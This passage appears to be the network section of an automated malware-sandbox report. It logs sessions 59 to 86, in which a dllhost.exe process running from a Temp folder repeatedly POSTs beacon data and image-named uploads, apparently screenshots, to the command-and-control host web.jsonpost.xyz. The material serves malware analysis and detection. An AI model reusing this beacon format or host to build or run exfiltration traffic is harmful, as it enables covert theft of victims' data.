                                                                                59 | 192.168.2.4 | 49795 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:47.264528036 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                60 | 192.168.2.4 | 49796 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:47.643878937 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:47.643923044 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                61 | 192.168.2.4 | 49797 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:48.733674049 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                62 | 192.168.2.4 | 49798 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:49.076442003 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:49.076653004 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                63 | 192.168.2.4 | 49799 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:50.401408911 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                64 | 192.168.2.4 | 49800 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:50.885485888 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:50.885580063 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                65          192.168.2.4  49801        72.52.178.23    80                7608  C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Nov 29, 2024 01:52:51.484558105 CET  235                OUT        POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                66          192.168.2.4  49802        72.52.178.23    80                7608  C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Nov 29, 2024 01:52:52.339449883 CET  195                OUT        POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----0c493e27f64201eb17b9a0de8f16fea0
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98257
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:52.339513063 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 30 63 34 39 33 65 32 37 66 36 34 32 30 31 65 62 31 37 62 39 61 30 64 65 38 66 31 36 66 65 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------0c493e27f64201eb17b9a0de8f16fea0Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                67          192.168.2.4  49803        72.52.178.23    80                7608  C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Nov 29, 2024 01:52:52.905103922 CET  235                OUT        POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                68          192.168.2.4  49804        72.52.178.23    80                7608  C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Nov 29, 2024 01:52:53.901676893 CET  195                OUT        POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----88c41d18d04efae2b058311875d35af8
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 99423
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:53.901699066 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 38 38 63 34 31 64 31 38 64 30 34 65 66 61 65 32 62 30 35 38 33 31 31 38 37 35 64 33 35 61 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------88c41d18d04efae2b058311875d35af8Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                69          192.168.2.4  49806        72.52.178.23    80                7608  C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Nov 29, 2024 01:52:54.374226093 CET  235                OUT        POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                70          192.168.2.4  49808        72.52.178.23    80                7608  C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Nov 29, 2024 01:52:55.377326965 CET  195                OUT        POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:55.377355099 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                71          192.168.2.4  49809        72.52.178.23    80                7608  C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Nov 29, 2024 01:52:56.008167028 CET  235                OUT        POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                72          192.168.2.4  49810        72.52.178.23    80                7608  C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Nov 29, 2024 01:52:56.966182947 CET  195                OUT        POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:56.966233969 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 49816 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:57.378237009 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 49817 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:58.548974037 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:58.549088955 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 49818 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:58.844618082 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 49824 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:00.027614117 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:00.027654886 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 49825 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:00.310821056 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 49826 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:01.527319908 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:01.527390957 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 49829 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:01.775747061 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 49833 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:03.002723932 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
Host: web.jsonpost.xyz
Content-Length: 98018
Cache-Control: no-cache
Nov 29, 2024 01:53:03.002819061 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.4 | 49834 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:03.186316013 CET | 219 | OUT | POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.4 | 49840 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:04.576699972 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
Host: web.jsonpost.xyz
Content-Length: 98018
Cache-Control: no-cache
Nov 29, 2024 01:53:04.576740980 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.4 | 49841 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:04.609155893 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.4 | 49843 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:06.048749924 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----67f1dda3f58c30bca5812691cfd54a6e
Host: web.jsonpost.xyz
Content-Length: 98283
Cache-Control: no-cache
Nov 29, 2024 01:53:06.048820972 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 36 37 66 31 64 64 61 33 66 35 38 63 33 30 62 63 61 35 38 31 32 36 39 31 63 66 64 35 34 61 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------67f1dda3f58c30bca5812691cfd54a6eContent-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.4 | 49844 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:53:06.061616898 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.4 | 49849 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
